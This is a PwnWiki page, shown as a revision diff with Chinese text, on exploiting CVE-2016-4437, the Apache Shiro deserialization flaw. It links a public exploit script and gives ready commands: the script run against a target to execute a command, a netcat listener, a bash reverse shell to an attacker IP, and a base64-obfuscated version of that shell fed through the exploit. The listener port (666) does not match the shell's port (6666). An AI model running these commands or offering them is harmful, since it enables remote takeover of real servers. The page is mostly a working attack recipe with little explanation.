Difference between revisions of "CVE-2016-4437 Shiro反序列化漏洞"
From PwnWiki
(Created page with "<languages /> ==POC== https://github.com/insightglacier/Shiro_exploit <translate> ==漏洞利用== </translate> <pre> python3 shiro_exploit.py -t 3 -u http://192.168.2.14...") |
(Marked this version for translation) |
||
| Line 6: | Line 6: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 13: | Line 13: | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
命令執行成功。 | 命令執行成功。 | ||
</translate> | </translate> | ||
| Line 19: | Line 20: | ||
==Getshell== | ==Getshell== | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
監聽機器執行以下命令: | 監聽機器執行以下命令: | ||
</translate> | </translate> | ||
| Line 26: | Line 28: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
受害機器執行以下命令: | 受害機器執行以下命令: | ||
</translate> | </translate> | ||
Latest revision as of 13:21, 7 April 2021
漏洞利用
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"
命令執行成功。
Getshell
監聽機器執行以下命令:
nc -lvp 666
受害機器執行以下命令:
bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
